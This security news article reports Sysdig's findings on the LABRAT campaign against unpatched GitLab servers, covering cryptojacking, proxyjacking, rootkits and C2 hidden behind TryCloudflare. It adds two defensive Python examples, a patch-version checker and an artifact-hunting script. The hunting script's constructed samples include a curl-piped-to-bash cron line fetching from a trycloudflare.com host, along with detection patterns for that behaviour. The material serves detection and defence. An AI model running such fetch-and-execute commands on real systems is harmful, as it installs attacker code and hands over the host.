A sophisticated attack employs stealthy and evasive techniques and tools to make defense and detection more challenging.

Researchers from Sysdig are warning of an ongoing attack campaign against vulnerable GitLab servers that results in the deployment of cryptojacking and proxyjacking malware. The attacks use cross-platform malware, kernel rootkits and multiple layers of obfuscation, and they try to evade detection by abusing legitimate services.

“This operation was much more sophisticated than many of the attacks the Sysdig TRT typically observes,” researchers from security firm Sysdig said in a new report. “Many attackers do not bother with stealth at all, but this attacker took special care when crafting their operation. The stealthy and evasive techniques and tools used in this operation make defense and detection more challenging.”

The attackers behind the campaign, which Sysdig has dubbed LABRAT, search for GitLab servers vulnerable to a known critical security issue tracked as CVE-2021-22205. The flaw stems from improper validation of image files when GitLab passes them to ExifTool and can result in remote code execution. It was patched in April 2021 in GitLab versions 13.8.8, 13.9.6 and 13.10.3, but exploits for it are still actively used, meaning attackers still find enough unpatched servers to justify its use.

Attackers exploit TryCloudflare to gain an advantage

Once they gain remote code execution, the attackers run a curl command to download and execute a malicious script from a command-and-control (C2) server with a trycloudflare.com hostname. TryCloudflare is a free-tier service provided by Cloudflare for users to evaluate various platform features. Attackers have been known to abuse it to hide the location of their actual C2 server, since Cloudflare’s network acts as a proxy in between.
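A version triage check for the CVE-2021-22205 paragraph above, written here as an added example; it is not code from Sysdig’s report or from GitLab. It encodes only the fixed releases the article states (13.8.8, 13.9.6 and 13.10.3). The host inventory is constructed, and treating every release older than 13.8.8 as unpatched is an assumption, since the page gives no lower bound for the affected range.

```python
"""Triage GitLab version strings against the CVE-2021-22205 fixes.

Added example, not code from the Sysdig report or from GitLab. It encodes
only what the article states: the fix shipped in 13.8.8, 13.9.6 and 13.10.3.
Assumption: the page gives no lower bound for affected releases, so anything
older than the 13.8 branch is treated as unpatched.
"""
import re
from typing import List, Tuple

# Minimum safe patch level per minor branch, as stated in the article.
FIXED_VERSIONS = {(13, 8): 8, (13, 9): 6, (13, 10): 3}


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse 'X.Y.Z' (with optional leading 'v' and '-ee'/'-ce' suffix) to ints."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def is_patched_for_cve_2021_22205(version: str) -> bool:
    """True if this release is at or above the fix on its own branch."""
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch in FIXED_VERSIONS:
        return patch >= FIXED_VERSIONS[branch]
    # Branches newer than 13.10 shipped after the fix; older branches never
    # received a backport (assumption, see module docstring).
    return branch > (13, 10)


def triage(hosts: List[Tuple[str, str]]) -> List[str]:
    """Return the hosts whose reported GitLab version still lacks the fix."""
    return [host for host, version in hosts if not is_patched_for_cve_2021_22205(version)]


if __name__ == "__main__":
    # Constructed inventory for the demo, not real hosts.
    inventory = [
        ("git-a.example", "13.10.2-ee"),
        ("git-b.example", "13.10.3-ee"),
        ("git-c.example", "13.9.6"),
        ("git-d.example", "13.7.9"),
        ("git-e.example", "16.2.1"),
    ]
    for host in triage(inventory):
        print("UNPATCHED:", host)
```

The point of the branch table is that a plain numeric comparison against the lowest fixed release is wrong here: 13.9.5 is numerically above 13.8.8 but still unpatched, because the fix landed on the 13.9 branch only at 13.9.6. Feed it whatever version string you collect from each instance (for example from GitLab’s /api/v4/version endpoint as an authenticated user).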
Once executed on a system, the script checks whether a watchdog process is running and tries to kill it, deletes files from previous infections, disables Tencent Cloud and Alibaba Cloud defensive measures, downloads additional malicious binaries, sets up new system services, modifies cron jobs to achieve persistence, and collects locally stored SSH keys, which are then used to move laterally to other systems.

To obfuscate their communication with the C2 servers, the attackers deployed Cloudflare Tunnel, a traffic tunneling solution that lets users expose local services through Cloudflare’s network without changing firewall settings or setting up port forwarding. Researchers from GuidePoint Security recently reported an increase in the number of attacks that abuse Cloudflare Tunnel and TryCloudflare.

In some of the attacks, the LABRAT attackers hosted their malicious binaries on a private GitLab server that has been online since September 2022 and has been continuously updated. It’s not clear whether the attackers own this server or whether it is a compromised one being misused to host their files.

LABRAT employs an advanced toolset

Across the various LABRAT attacks they investigated, the Sysdig researchers saw the threat actor behind the campaign use multiple off-the-shelf tools. One of them is an open-source tool called Global Socket (GSocket) that allows two systems inside different private networks to communicate with each other without port forwarding. This is achieved through a network of relays that use encryption and can also route traffic through Tor, making it very hard to discover the other machine. In this case, GSocket was used as a backdoor through which the attackers could remotely access the system and issue commands. Installing GSocket as a system service that starts at reboot requires root, so to achieve that persistence the attackers tried to exploit the PwnKit (CVE-2021-4034) privilege escalation vulnerability on Linux systems.
The researchers also found evidence that the LABRAT attackers used an open-source rootkit called hiding-cryptominers-linux-rootkit, which hides files, processes and their CPU usage in order to obscure cryptomining activity. A practical consequence is that process listings and CPU statistics read from inside a suspected host cannot be trusted; corroborate them from outside, for example with network telemetry or hypervisor-level metrics. The rootkit is there because LABRAT is ultimately a financially driven operation, and one of the ways the attackers monetized the hacked servers was by deploying a custom variant of the open-source XMRig cryptocurrency mining program. It was deployed by a loader written in the Go programming language that installed the miner as a service masquerading as the legitimate sshd (SSH daemon) service.

Attackers also make money using IPRoyal-related tool

A second way the attackers made money was by deploying a tool associated with the IPRoyal service, which lets users share their bandwidth with others for a fee by running proxy software on their machines. This method of exploiting compromised machines is increasingly common and has been dubbed proxyjacking. The researchers also found files associated with another proxy service called ProxyLite. The tool provided by that service is written in .NET Core, which makes it cross-platform, and it uses obfuscation techniques that appear designed to make detection and analysis harder.

“Cryptomining and proxyjacking should never be considered nuisance malware and be written off by having the system rebuilt without a thorough investigation,” the Sysdig researchers warned. “As seen in this operation, malware does have the ability to automatically spread to other systems with SSH keys. We have also seen in the past, with SCARLETEEL, that attackers will install cryptominers, but also steal intellectual property if they have the opportunity.”

The Sysdig report contains various indicators of compromise associated with this ongoing campaign, such as file names and hashes, malicious URLs and IP addresses, that can be used to build detections.
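A host-artifact hunt for the behaviours described in the two sections above (the cron and service persistence, the curl download-and-execute from a trycloudflare.com host, the miner service masquerading as sshd, and lateral movement with stolen SSH keys), written here as an added example. It is not Sysdig’s detection logic and uses none of the report’s indicators; every crontab, unit file and log line below is constructed for the demo, the sshd binary locations are an assumption, and the rule names and host addresses are invented.

```python
"""Hunt for the behaviours the article attributes to the LABRAT operation.

Added example: not the Sysdig report's own detection logic and none of its
indicators. It checks only for behaviours described on this page: a curl
download-and-execute from a trycloudflare.com host, cron entries used for
persistence, a miner service masquerading as sshd, and key-based SSH logins
from an already-flagged host. All samples below are constructed for the demo.
"""
import re
from dataclasses import dataclass
from typing import List, Set

# Where the real OpenSSH daemon lives on common distros (assumption).
LEGIT_SSHD = {"/usr/sbin/sshd", "/usr/bin/sshd"}

TRYCLOUDFLARE = re.compile(r"https?://[\w.-]*trycloudflare\.com", re.I)
# curl/wget fetching from a trycloudflare.com URL and piping into a shell.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^\n|;]*trycloudflare\.com[^\n|;]*\|\s*(ba)?sh\b", re.I)
AUTH_LOGIN = re.compile(r"Accepted publickey for (\S+) from (\d+\.\d+\.\d+\.\d+)")


@dataclass
class Finding:
    source: str
    rule: str
    evidence: str


def hunt_crontab(source: str, text: str) -> List[Finding]:
    """Flag cron entries that fetch-and-run from, or merely reference, TryCloudflare."""
    out = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if FETCH_EXEC.search(s):
            out.append(Finding(source, "cron-fetch-exec-trycloudflare", s))
        elif TRYCLOUDFLARE.search(s):
            out.append(Finding(source, "cron-trycloudflare-url", s))
    return out


def hunt_unit(path: str, text: str) -> List[Finding]:
    """Flag a systemd unit that presents itself as sshd but starts something else."""
    keys = {}
    for line in text.splitlines():
        s = line.strip()
        if "=" in s and not s.startswith(("#", "[")):
            k, v = s.split("=", 1)
            keys[k.strip()] = v.strip()
    exec_start = keys.get("ExecStart", "")
    binary = exec_start.split()[0] if exec_start else ""
    unit = path.rsplit("/", 1)[-1].split(".")[0]
    claims_sshd = unit in {"ssh", "sshd"} or "openssh" in keys.get("Description", "").lower()
    out = []
    if claims_sshd and binary and binary not in LEGIT_SSHD:
        out.append(Finding(path, "sshd-masquerade", exec_start))
    if TRYCLOUDFLARE.search(text):
        out.append(Finding(path, "unit-trycloudflare-url", exec_start or text.strip()))
    return out


def hunt_auth_log(source: str, text: str, suspect_ips: Set[str]) -> List[Finding]:
    """Key-based logins whose source address belongs to a host already flagged."""
    out = []
    for line in text.splitlines():
        m = AUTH_LOGIN.search(line)
        if m and m.group(2) in suspect_ips:
            out.append(Finding(source, "key-login-from-suspect-host", line.strip()))
    return out


# Constructed samples (not real artefacts from the campaign).
ROOT_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL https://some-random-words.trycloudflare.com/setup.sh | bash
"""
FAKE_SSHD_UNIT = """\
[Unit]
Description=OpenSSH server daemon

[Service]
ExecStart=/usr/lib/.cache/sshd -c /usr/lib/.cache/config.json
Restart=always

[Install]
WantedBy=multi-user.target
"""
REAL_SSHD_UNIT = """\
[Unit]
Description=OpenSSH server daemon

[Service]
ExecStart=/usr/sbin/sshd -D $OPTIONS
"""
AUTH_LOG = """\
Aug 17 04:12:09 build-02 sshd[2231]: Accepted publickey for root from 10.20.0.7 port 41222 ssh2: RSA SHA256:AAAA
Aug 17 08:00:01 build-02 sshd[2410]: Accepted publickey for deploy from 10.20.0.3 port 50110 ssh2: ED25519 SHA256:BBBB
"""


def run_hunt() -> List[Finding]:
    findings = hunt_crontab("gitlab-01:/var/spool/cron/root", ROOT_CRONTAB)
    findings += hunt_unit("/etc/systemd/system/sshd.service", FAKE_SSHD_UNIT)
    findings += hunt_unit("/usr/lib/systemd/system/sshd.service", REAL_SSHD_UNIT)
    # gitlab-01 (10.20.0.7 in this demo) is flagged; look for hops made from it.
    findings += hunt_auth_log("build-02:/var/log/auth.log", AUTH_LOG, {"10.20.0.7"})
    return findings


if __name__ == "__main__":
    for f in run_hunt():
        print(f"{f.rule:32} {f.source}: {f.evidence}")
```

Run the unit and crontab checks from a live-response image or a mounted disk rather than through tools on the running host, since the rootkit described above hides files and processes from them. The auth-log pass is the step that turns one confirmed host into a list of where its stolen keys were used next.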